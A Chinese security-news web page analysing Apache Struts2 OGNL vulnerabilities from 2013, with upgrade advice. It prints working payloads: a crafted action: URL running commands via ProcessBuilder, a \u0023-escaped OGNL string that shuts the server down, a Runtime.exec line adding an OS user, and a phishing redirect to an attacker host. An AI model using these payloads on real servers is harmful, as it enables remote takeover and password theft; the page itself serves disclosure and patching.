• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >业界动态 > struts2安全漏洞分析

struts2安全漏洞分析

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了struts2安全漏洞分析,其中包含struts2安全漏洞,struts2漏洞,struts2漏洞利用工具,struts2漏洞检测工具,apache struts2漏洞等知识点,遇到此问题的同学们可以参考下

在2013年6月底发布的Struts 2.3.15版本被曝出存在重要的安全漏洞 ,主要问题如下:

可远程执行服务器脚本代码

用户可以构造http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}链接,command goes here可以换成是破坏脚本的路径和参数,比如fdisk -f等,造成破环系统无法运行的目的。

重定向漏洞

用户可以构造如知名网站淘宝的重定向连接,形如<a href="http://www.淘宝.com/item00001.html?redirect:http://黑客/getyourPassword">打折新款</a>,引导用户点击后进入钓鱼网站,在界面上让其进行登陆用以获取用户的密码。

造成的影响:
苹果、中国移动、中国联通、百度、腾讯、淘宝、京东、Sohu、民生银行等大型企业的网站均遭毒手,运维 工程师苦不堪言。

应对措施:

Apache团队紧急发布了Struts 2.3.15.1安全更新版本,可升级到此版本来解决上述问题。

struts2漏洞攻击方法与解决方案

1、原理
Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数:

?user.address.city=Bishkek&user['favoriteDrink']=kumys 
ONGL将它转换为:

这是通过ParametersInterceptor(参数过滤器)来执行的,使用用户提供的HTTP参数调用 ValueStack.setValue()。
为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的 unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值:

此处代码有破坏性,请在测试环境执行,严禁用此种方法进行恶意攻击

转义后是这样:
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1 

OGNL处理时最终的结果就是
java.lang.Runtime.getRuntime().exit(1);  //关闭程序,即将web程序关闭

类似的可以执行
java.lang.Runtime.getRuntime().exec("net user 用户名 密码 /add");//增加操作系统用户,在有权限的情况下能成功(在URL中用%20替换空格,%2F替换/)
只要有权限就可以执行任何DOS命令。

2、解决方法
网上很多文章都介绍了三种解决方法,个人觉得将struts2的jar包更新到最新版本最简单,不用更改任何程序代码,目前最新版本2.3.4

下载到的更新包中有很多jar包,我系统中主要用到以下几个替换掉旧版本的:
commons-lang3-3.1.jar        (保留commons-lang-2.6.jar)
javassist-3.11.0.GA.jar        (新加包)
ognl-3.0.5.jar            (替换旧版本)
struts2-core-2.3.4.1.jar    (替换旧版本)
xwork-core-2.3.4.1.jar        (替换旧版本)

本文大部分内容复制于其他文章:
http://my-corner.iteye.com/blog/720209

</div>

您可能想查找下面的文章:

  • struts2安全漏洞分析

相关文章

  • 黑客利用网络色情广告散播木马年入百万
  • 未来互联网企业安全问题预测 网络安全是场硬仗
  • Android安卓其实是Google下的一剂药
  • 揭秘比木马挖矿还要“暴利”的网络偷窃行为
  • 关于网址的HTTP头引发的我们关于安全问题的思考
  • 小米手机收货后开箱实拍图 解解馋吧
  • 支付宝花呗套现隐患多多 骗子已经形成产业链
  • 苹果Touch ID的安全”保险箱“再次被攻破,密钥安全该怎么做
  • 世界顶尖的[白帽子] 全球TOP7 漏洞猎人
  • 不为人知的地下暗流:揭秘色情推广“影科技”家族背后的流量生意

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • 中国移动WFIF疑遭破解 蹭WIFI网凸显管控难题
    • 《2017美国网络犯罪现状报告》:企业今年面临哪些安全问题,应该如何解决?
    • 10种方式智能手机可获取你行踪
    • 木马病毒产业链 木马制作和分销
    • 未来互联网企业安全问题预测 网络安全是场硬仗
    • Gartner 2017年WAF魔力象限报告:云WAF将替代物理设备成为主流
    • 首次使用瑞星网络版杀毒软件要注意的问题
    • struts2安全漏洞分析
    • 世界顶尖的[白帽子] 全球TOP7 漏洞猎人
    • 传瑞星推 私有云 或再次震动杀毒行业

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有